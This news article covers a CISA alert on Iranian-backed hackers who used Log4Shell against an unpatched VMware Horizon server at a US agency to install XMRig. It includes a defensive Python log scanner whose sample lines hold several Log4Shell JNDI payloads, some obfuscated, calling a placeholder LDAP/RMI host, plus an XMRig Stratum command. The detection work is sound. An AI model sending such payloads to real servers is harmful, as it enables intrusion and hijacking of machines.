Hackers backed by the Iranian regime broke into the network of a U.S. federal government agency and used that access to install cryptocurrency mining software, the Cybersecurity and Infrastructure Security Agency (CISA) said in an alert on Wednesday.
Officials first noticed evidence of advanced persistent threat (APT) activity on the agency’s network in April of this year and determined that it had been compromised since at least February.
The hackers exploited a vulnerability to install XMRig crypto mining software and compromise credentials in the network.
CISA did not identify the compromised agency, but said that it was publishing the alert to “help network defenders detect and protect against related compromises.”
The Iranian-backed hackers exploited the Log4Shell vulnerability (CVE-2021-44228), first disclosed last December, in an unpatched VMware Horizon server.
“CISA and FBI encourage all organizations with affected VMware systems that did not immediately apply available patches or workarounds to assume compromise and initiate threat hunting activities,” CISA said Wednesday.
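As an added example, not code from the CISA alert or from this article, the script below shows what a first pass at the threat hunting CISA recommends can look like: it scans web-server log lines for Log4Shell JNDI lookups, collapses the nested-lookup tricks attackers use to hide the string "jndi" (such as `${lower:j}` or `${::-j}`), pulls out the callback host and port, and flags miner indicators such as the XMRig binary name or a Stratum pool URL. The log lines are constructed for the example in the shape of a Tomcat access log; the IP addresses, paths and the placement of the payload in the User-Agent field are assumptions, not indicators from the alert.

```python
import re
from typing import Dict, List, Optional, Set

# Constructed sample lines (not from the CISA alert).  The first four imitate
# a Tomcat combined access log as written by a Horizon Connection Server, with
# the payload carried in the User-Agent field (assumed injection point); the
# last imitates an application log recording a spawned process.
SAMPLE_LOGS = [
    '10.0.0.5 - - [12/Apr/2022:03:14:07 +0000] "GET /portal/ HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Apr/2022:03:15:22 +0000] "GET /broker/xml HTTP/1.1" 200 77 "-" "${jndi:ldap://198.51.100.23:1389/a}"',
    '10.0.0.9 - - [12/Apr/2022:03:15:40 +0000] "GET /broker/xml HTTP/1.1" 200 77 "-" "${${lower:j}${upper:n}di:${lower:l}dap://198.51.100.23:1389/b}"',
    '10.0.0.9 - - [12/Apr/2022:03:16:01 +0000] "GET /broker/xml HTTP/1.1" 200 77 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.23:1099/c}"',
    '2022-04-12 03:16:30 INFO  process spawned: /tmp/.x/xmrig -o stratum+tcp://203.0.113.8:3333 -u wallet --donate-level=1',
]

# An innermost ${...} lookup: a body with no nested '$', '{' or '}'.
INNER = re.compile(r'\$\{([^${}]*)\}')
# A decoded JNDI lookup, capturing the scheme and the callback host:port.
JNDI = re.compile(r'\$\{\s*jndi\s*:\s*([a-z]+)\s*:\s*//\s*([^/\s}]+)', re.I)
# Miner indicators: the XMRig binary name or a Stratum mining-pool URL.
MINER = re.compile(r'\bxmrig\b|stratum\+(?:tcp|ssl)://', re.I)


def deobfuscate(s: str, max_rounds: int = 32) -> str:
    """Collapse the Log4j lookup nesting used to hide the string 'jndi'.

    Resolves, innermost first and repeatedly:
      ${lower:x} / ${upper:x}  -> x   (case does not matter for detection)
      ${anything:-default}     -> default   (the ${::-j} trick)
    The final ${jndi:...} lookup itself is left in place so it can be matched.
    """
    def resolve(m: "re.Match[str]") -> str:
        body = m.group(1)
        low = body.lower()
        if low.startswith('jndi:'):
            return m.group(0)          # keep the payload intact
        if ':-' in body:
            return body.split(':-', 1)[1]
        for prefix in ('lower:', 'upper:'):
            if low.startswith(prefix):
                return body[len(prefix):]
        return m.group(0)              # unknown lookup: leave as-is

    for _ in range(max_rounds):
        nxt = INNER.sub(resolve, s)
        if nxt == s:
            break
        s = nxt
    return s


def scan_line(line: str) -> Optional[Dict[str, str]]:
    """Return a finding for one log line, or None if nothing matched."""
    decoded = deobfuscate(line)
    m = JNDI.search(decoded)
    if m:
        return {
            'kind': 'log4shell_probe',
            'scheme': m.group(1).lower(),
            'callback': m.group(2),
            'obfuscated': 'yes' if decoded != line else 'no',
            'decoded': decoded,
        }
    if MINER.search(line):
        return {'kind': 'miner_indicator', 'obfuscated': 'no', 'decoded': line}
    return None


def scan(lines: List[str]) -> List[Dict[str, str]]:
    """Scan every line and return the findings with 1-based line numbers."""
    findings = []
    for n, line in enumerate(lines, 1):
        f = scan_line(line)
        if f:
            f['line'] = str(n)
            findings.append(f)
    return findings


def callbacks(findings: List[Dict[str, str]]) -> Set[str]:
    """Unique host:port values the JNDI payloads tried to reach (for blocking/pivoting)."""
    return {f['callback'] for f in findings if f['kind'] == 'log4shell_probe'}


if __name__ == '__main__':
    results = scan(SAMPLE_LOGS)
    for f in results:
        print(f['line'], f['kind'], f.get('callback', ''), f['decoded'][:90])
    print('callback hosts:', sorted(callbacks(results)))
```

A hit on the decoded JNDI pattern only proves a probe reached the server, not that it succeeded; the callback host and port are the next pivot, since a successful exploit shows up as an outbound LDAP or RMI connection from the Horizon host to that address around the same timestamp, followed by the miner process and the credential activity described above.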
Iran’s Islamic Revolutionary Guard Corps frequently uses contractors in the country’s private sector to orchestrate state-sponsored cyberattacks, according to CISA.
It’s unclear if the hackers installed cryptocurrency mining software to enrich themselves or at the behest of the Iranian regime, which has increasingly turned to crypto to evade sanctions in recent years.